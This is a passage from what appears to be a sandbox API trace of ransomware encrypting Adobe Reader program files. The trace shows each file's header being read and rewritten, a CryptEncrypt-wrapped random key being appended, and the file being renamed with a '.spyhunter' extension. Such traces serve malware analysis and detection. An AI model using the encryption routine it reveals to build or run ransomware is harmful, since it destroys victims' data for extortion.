WriteFile (in: hFile=0x154, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f614, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x270f614*=0x30, lpOverlapped=0x0) returned 1 [0119.158] CloseHandle (hObject=0x154) returned 1 [0119.158] GetProcessHeap () returned 0x2c0000 [0119.158] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e7af38 [0119.158] wnsprintfW (in: pszDest=0x2e7af38, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins3d\\drvDX9.x3d.spyhunter") returned 83 [0119.158] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins3d\\drvDX9.x3d" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins3d\\drvdx9.x3d"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins3d\\drvDX9.x3d.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins3d\\drvdx9.x3d.spyhunter")) returned 1 [0119.159] GetProcessHeap () returned 0x2c0000 [0119.159] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e7af38 | out: hHeap=0x2c0000) returned 1 [0119.159] GetProcessHeap () returned 0x2c0000 [0119.159] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0119.159] GetProcessHeap () returned 0x2c0000 [0119.159] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e446e8 | out: hHeap=0x2c0000) returned 1 [0119.164] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f650 | out: pbBuffer=0x270f650) returned 1 [0119.164] GetProcessHeap () returned 0x2c0000 [0119.165] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0119.165] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f648*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f648*=0x30) returned 1 [0119.165] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\ScCore.dll" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\sccore.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0119.168] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\ScCore.dll") returned 62 [0119.168] StrStrW (lpFirst="ScCore.dll", lpSrch=".txt") returned 0x0 [0119.168] GetProcessHeap () returned 0x2c0000 [0119.168] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0119.168] ReadFile (in: hFile=0x154, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f60c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270f60c*=0x2800, lpOverlapped=0x0) returned 1 [0119.201] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0119.201] WriteFile (in: hFile=0x154, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270f60c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270f60c*=0x2800, lpOverlapped=0x0) returned 1 [0119.201] GetProcessHeap () returned 0x2c0000 [0119.201] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0119.201] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0119.202] WriteFile (in: hFile=0x154, lpBuffer=0x270f64c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f60c, lpOverlapped=0x0 | out: lpBuffer=0x270f64c*, lpNumberOfBytesWritten=0x270f60c*=0x4, lpOverlapped=0x0) returned 1 [0119.213] WriteFile (in: hFile=0x154, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f60c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x270f60c*=0x30, lpOverlapped=0x0) returned 1 [0119.213] CloseHandle (hObject=0x154) returned 1 [0119.213] GetProcessHeap () returned 0x2c0000 [0119.213] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c7e1b0 [0119.215] wnsprintfW (in: pszDest=0x2c7e1b0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\ScCore.dll.spyhunter") returned 72 [0119.215] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\ScCore.dll" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\sccore.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\ScCore.dll.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\sccore.dll.spyhunter")) returned 1 [0119.216] GetProcessHeap () returned 0x2c0000 [0119.216] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c7e1b0 | out: hHeap=0x2c0000) returned 1 [0119.216] GetProcessHeap () returned 0x2c0000 [0119.216] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0119.216] GetProcessHeap () returned 0x2c0000 [0119.216] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cbf3d0 | out: hHeap=0x2c0000) returned 1 [0119.218] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f648 | out: pbBuffer=0x270f648) returned 1 [0119.218] GetProcessHeap () returned 0x2c0000 [0119.218] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0119.218] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f640*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f640*=0x30) returned 1 [0119.218] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\wow_helper.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\wow_helper.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0119.218] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\wow_helper.exe") returned 66 [0119.219] StrStrW (lpFirst="wow_helper.exe", lpSrch=".txt") returned 0x0 [0119.219] GetProcessHeap () returned 0x2c0000 [0119.219] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0119.219] ReadFile (in: hFile=0x154, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f604, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270f604*=0x2800, lpOverlapped=0x0) returned 1 [0119.246] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0119.246] WriteFile (in: hFile=0x154, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270f604, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270f604*=0x2800, lpOverlapped=0x0) returned 1 [0119.246] GetProcessHeap () returned 0x2c0000 [0119.246] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0119.246] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0119.246] WriteFile (in: hFile=0x154, lpBuffer=0x270f644*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f604, lpOverlapped=0x0 | out: lpBuffer=0x270f644*, lpNumberOfBytesWritten=0x270f604*=0x4, lpOverlapped=0x0) returned 1 [0119.249] WriteFile (in: hFile=0x154, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f604, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x270f604*=0x30, lpOverlapped=0x0) returned 1 [0119.249] CloseHandle (hObject=0x154) returned 1 [0119.249] GetProcessHeap () returned 0x2c0000 [0119.249] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0119.249] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\wow_helper.exe.spyhunter") returned 76 [0119.249] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\wow_helper.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\wow_helper.exe"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\wow_helper.exe.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\wow_helper.exe.spyhunter")) returned 1 [0119.250] GetProcessHeap () returned 0x2c0000 [0119.250] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0119.250] GetProcessHeap () returned 0x2c0000 [0119.250] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0119.250] GetProcessHeap () returned 0x2c0000 [0119.250] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e02b18 | out: hHeap=0x2c0000) returned 1 [0119.250] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f648 | out: pbBuffer=0x270f648) returned 1 [0119.250] GetProcessHeap () returned 0x2c0000 [0119.250] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0119.250] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f640*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f640*=0x30) returned 1 [0119.251] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeSKY.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\readmesky.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0119.252] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeSKY.htm") returned 58 [0119.252] StrStrW (lpFirst="ReadMeSKY.htm", lpSrch=".txt") returned 0x0 [0119.252] GetProcessHeap () returned 0x2c0000 [0119.252] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0119.252] ReadFile (in: hFile=0x154, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f604, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x270f604*=0x2800, lpOverlapped=0x0) returned 1 [0119.266] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0119.266] WriteFile (in: hFile=0x154, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270f604, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x270f604*=0x2800, lpOverlapped=0x0) returned 1 [0119.267] GetProcessHeap () returned 0x2c0000 [0119.267] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0119.267] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0119.267] WriteFile (in: hFile=0x154, lpBuffer=0x270f644*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f604, lpOverlapped=0x0 | out: lpBuffer=0x270f644*, lpNumberOfBytesWritten=0x270f604*=0x4, lpOverlapped=0x0) returned 1 [0119.268] WriteFile (in: hFile=0x154, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f604, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x270f604*=0x30, lpOverlapped=0x0) returned 1 [0119.268] CloseHandle (hObject=0x154) returned 1 [0119.268] GetProcessHeap () returned 0x2c0000 [0119.268] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ea7ba0 [0119.270] wnsprintfW (in: pszDest=0x2ea7ba0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeSKY.htm.spyhunter") returned 68 [0119.270] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeSKY.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\readmesky.htm"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeSKY.htm.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\readmesky.htm.spyhunter")) returned 1 [0119.271] GetProcessHeap () returned 0x2c0000 [0119.271] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea7ba0 | out: hHeap=0x2c0000) returned 1 [0119.271] GetProcessHeap () returned 0x2c0000 [0119.271] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0119.271] GetProcessHeap () returned 0x2c0000 [0119.271] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e5f640 | out: hHeap=0x2c0000) returned 1 [0119.271] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f640 | out: pbBuffer=0x270f640) returned 1 [0119.271] GetProcessHeap () returned 0x2c0000 [0119.272] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0119.272] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f638*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f638*=0x30) returned 1 [0119.272] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeRUS.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\readmerus.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0119.272] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeRUS.htm") returned 58 [0119.272] StrStrW (lpFirst="ReadMeRUS.htm", lpSrch=".txt") returned 0x0 [0119.273] GetProcessHeap () returned 0x2c0000 [0119.273] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0119.273] ReadFile (in: hFile=0x154, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f5fc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x270f5fc*=0x2800, lpOverlapped=0x0) returned 1 [0119.287] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0119.287] WriteFile (in: hFile=0x154, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270f5fc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x270f5fc*=0x2800, lpOverlapped=0x0) returned 1 [0119.287] GetProcessHeap () returned 0x2c0000 [0119.288] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0119.288] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0119.288] WriteFile (in: hFile=0x154, lpBuffer=0x270f63c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f5fc, lpOverlapped=0x0 | out: lpBuffer=0x270f63c*, lpNumberOfBytesWritten=0x270f5fc*=0x4, lpOverlapped=0x0) returned 1 [0119.665] WriteFile (in: hFile=0x154, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f5fc, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x270f5fc*=0x30, lpOverlapped=0x0) returned 1 [0119.665] CloseHandle (hObject=0x154) returned 1 [0119.665] GetProcessHeap () returned 0x2c0000 [0119.665] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e7af38 [0119.666] wnsprintfW (in: pszDest=0x2e7af38, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeRUS.htm.spyhunter") returned 68 [0119.666] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeRUS.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\readmerus.htm"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeRUS.htm.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\readmerus.htm.spyhunter")) returned 1 [0119.666] GetProcessHeap () returned 0x2c0000 [0119.667] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e7af38 | out: hHeap=0x2c0000) returned 1 [0119.667] GetProcessHeap () returned 0x2c0000 [0119.667] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0119.667] GetProcessHeap () returned 0x2c0000 [0119.667] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e5f580 | out: hHeap=0x2c0000) returned 1 [0119.669] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f638 | out: pbBuffer=0x270f638) returned 1 [0119.669] GetProcessHeap () returned 0x2c0000 [0119.669] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0119.669] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f630*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f630*=0x30) returned 1 [0119.669] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CIDFont\\KozMinPr6N-Regular.otf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cidfont\\kozminpr6n-regular.otf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0119.692] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CIDFont\\KozMinPr6N-Regular.otf") returned 84 [0119.692] StrStrW (lpFirst="KozMinPr6N-Regular.otf", lpSrch=".txt") returned 0x0 [0119.692] GetProcessHeap () returned 0x2c0000 [0119.692] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0119.692] ReadFile (in: hFile=0x154, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f5f4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x270f5f4*=0x2800, lpOverlapped=0x0) returned 1 [0119.709] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0119.709] WriteFile (in: hFile=0x154, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270f5f4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x270f5f4*=0x2800, lpOverlapped=0x0) returned 1 [0119.710] GetProcessHeap () returned 0x2c0000 [0119.710] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0119.710] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0119.710] WriteFile (in: hFile=0x154, lpBuffer=0x270f634*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f5f4, lpOverlapped=0x0 | out: lpBuffer=0x270f634*, lpNumberOfBytesWritten=0x270f5f4*=0x4, lpOverlapped=0x0) returned 1 [0119.721] WriteFile (in: hFile=0x154, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f5f4, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x270f5f4*=0x30, lpOverlapped=0x0) returned 1 [0119.721] CloseHandle (hObject=0x154) returned 1 [0119.734] GetProcessHeap () returned 0x2c0000 [0119.734] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e7af38 [0119.734] wnsprintfW (in: pszDest=0x2e7af38, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CIDFont\\KozMinPr6N-Regular.otf.spyhunter") returned 94 [0119.734] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CIDFont\\KozMinPr6N-Regular.otf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cidfont\\kozminpr6n-regular.otf"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CIDFont\\KozMinPr6N-Regular.otf.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cidfont\\kozminpr6n-regular.otf.spyhunter")) returned 1 [0119.735] GetProcessHeap () returned 0x2c0000 [0119.735] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e7af38 | out: hHeap=0x2c0000) returned 1 [0119.735] GetProcessHeap () returned 0x2c0000 [0119.735] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0119.735] GetProcessHeap () returned 0x2c0000 [0119.736] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e4b4c8 | out: hHeap=0x2c0000) returned 1 [0119.736] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f638 | out: pbBuffer=0x270f638) returned 1 [0119.736] GetProcessHeap () returned 0x2c0000 [0119.736] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0119.736] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f630*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f630*=0x30) returned 1 [0119.736] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CIDFont\\AdobeMyungjoStd-Medium.otf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cidfont\\adobemyungjostd-medium.otf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0119.737] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CIDFont\\AdobeMyungjoStd-Medium.otf") returned 88 [0119.737] StrStrW (lpFirst="AdobeMyungjoStd-Medium.otf", lpSrch=".txt") returned 0x0 [0119.737] GetProcessHeap () returned 0x2c0000 [0119.737] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0119.737] ReadFile (in: hFile=0x154, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f5f4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270f5f4*=0x2800, lpOverlapped=0x0) returned 1 [0119.739] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0119.739] WriteFile (in: hFile=0x154, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270f5f4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270f5f4*=0x2800, lpOverlapped=0x0) returned 1 [0119.739] GetProcessHeap () returned 0x2c0000 [0119.739] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0119.739] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0119.739] WriteFile (in: hFile=0x154, lpBuffer=0x270f634*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f5f4, lpOverlapped=0x0 | out: lpBuffer=0x270f634*, lpNumberOfBytesWritten=0x270f5f4*=0x4, lpOverlapped=0x0) returned 1 [0119.778] WriteFile (in: hFile=0x154, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f5f4, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x270f5f4*=0x30, lpOverlapped=0x0) returned 1 [0119.778] CloseHandle (hObject=0x154) returned 1 [0119.793] GetProcessHeap () returned 0x2c0000 [0119.793] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e7af38 [0119.793] wnsprintfW (in: pszDest=0x2e7af38, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CIDFont\\AdobeMyungjoStd-Medium.otf.spyhunter") returned 98 [0119.793] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CIDFont\\AdobeMyungjoStd-Medium.otf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cidfont\\adobemyungjostd-medium.otf"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CIDFont\\AdobeMyungjoStd-Medium.otf.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cidfont\\adobemyungjostd-medium.otf.spyhunter")) returned 1 [0119.794] GetProcessHeap () returned 0x2c0000 [0119.794] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e7af38 | out: hHeap=0x2c0000) returned 1 [0119.794] GetProcessHeap () returned 0x2c0000 [0119.794] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0119.794] GetProcessHeap () returned 0x2c0000 [0119.794] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e5d3c0 | 